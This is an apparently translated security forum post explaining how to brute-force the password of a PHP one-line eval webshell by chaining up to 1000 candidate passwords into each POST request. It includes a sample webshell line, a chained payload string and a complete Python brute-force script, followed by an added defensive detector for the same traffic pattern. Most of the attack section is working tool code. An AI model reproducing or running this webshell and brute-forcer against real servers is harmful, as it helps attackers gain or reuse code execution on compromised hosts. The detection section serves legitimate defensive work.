After reading 冰河's article I found it really inspiring: https://bbs.ichunqiu.com/thread-16952-1-1.html
A brief description:
The technique exploits the traditional single-value submission model.
Take the following one-line webshell as an example:
<?php @eval($_POST['test']);?>
If the request is http://172.16.0.5/index.php?shell?test=echo "password is test";
then the submitted variable is: test=echo "password is test";
If the password is correct, the echo is executed and the page prints password is test.
Then "&" is used to chain many candidates into a single request for brute-forcing. Apache actually allows at most 1000 parameters per request; IIS allows 5883.
That is:
i3ekr=echo "password is i3ekr";&123=echo "password is 123";&admin=echo "password is admin";&1=echo "password is 1";&pass=echo "password is pass";&test=echo "password is test";
From this a brute-force script can be written.
Script:
# -*- coding: UTF-8 -*-
# coding by v5est0r
# Submit many variables in one request: speeds up one-liner webshell brute-forcing roughly a thousandfold
import requests

shell = 'http://192.168.1.103/hack.php'  # v5est0r=response.write("password:v5est0r")
post_data = {}  # POST fields for the current batch

with open('pass.txt', 'r') as s:
    content = s.readlines()  # read the wordlist line by line

group = []  # one entry per wordlist line
for h in range(len(content)):
    password = str(content[h]).strip()  # strip the trailing newline and surrounding whitespace
    if password:
        group.append(password)
# print(group)

# split the wordlist into batches of 1000 (the per-request parameter limit); keep the final partial batch
dics = (len(group) + 999) // 1000
print('Number of candidates in the current wordlist: %s' % len(group))
print('The wordlist will be split into %s batches' % dics)

# establish the response signature for a wrong password
post_test = {'test_pass_test': 'echo "test!!";'}
res = requests.post(shell, data=post_test)
wrong_res = res.text

for i in range(dics):
    new_group = group[i * 1000:(i + 1) * 1000]  # the next batch of up to 1000 candidates
    for each in new_group:
        post_data[each] = 'echo "password is %s";' % each
    r = requests.post(shell, data=post_data)
    print('Brute-forcing with wordlist batch %s' % (i + 1))
    post_data.clear()
    print(r.text)
    if len(r.text) != len(wrong_res):  # a different response length means one candidate executed
        break
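From the defender's side, as an added example that is not part of the original post: a small detector for the many-variables-per-request pattern described above, run over URL-encoded POST bodies. The thresholds, marker list and sample bodies are my own assumptions, not values from the post.

```python
# Added detection example (not from the original post): flag POST bodies that carry
# the "many variables per request" webshell brute-force pattern.
from urllib.parse import parse_qsl

# Thresholds and markers are assumptions for illustration only.
MAX_FIELDS = 50  # ordinary HTML forms rarely carry more than a few dozen fields
PHP_MARKERS = ('echo ', 'eval(', 'system(', 'assert(')


def analyze_body(body: str) -> dict:
    """Return counters describing how suspicious a URL-encoded POST body looks."""
    fields = parse_qsl(body, keep_blank_values=True)
    # values that look like PHP statements rather than form input
    code_like = [v for _, v in fields if any(m in v for m in PHP_MARKERS)]
    # the chained brute-force sets every value to code that names its own key,
    # e.g. admin=echo "password is admin";
    self_ref = [k for k, v in fields if k and k in v and v.rstrip().endswith(';')]
    return {'fields': len(fields), 'code_like': len(code_like), 'self_ref': len(self_ref)}


def is_webshell_bruteforce(body: str) -> bool:
    """True when a body is far larger than any legitimate form or is mostly self-naming code."""
    stats = analyze_body(body)
    if stats['fields'] == 0:
        return False
    return (stats['fields'] > MAX_FIELDS
            or stats['self_ref'] >= 3
            or stats['code_like'] * 2 > stats['fields'])


# Constructed sample bodies for a local check (not captured traffic)
BENIGN = 'username=alice&password=s3cret&remember=1'
PROBE = 'i3ekr=echo "password is i3ekr";&123=echo "password is 123";&admin=echo "password is admin";'

if __name__ == '__main__':
    for name, body in (('benign', BENIGN), ('probe', PROBE)):
        print(name, analyze_body(body), is_webshell_bruteforce(body))
```

In practice the same check belongs in a WAF rule or a log pipeline keyed on request bodies, alongside a simple alert on the raw parameter count, since a single request carrying hundreds of fields is itself unusual.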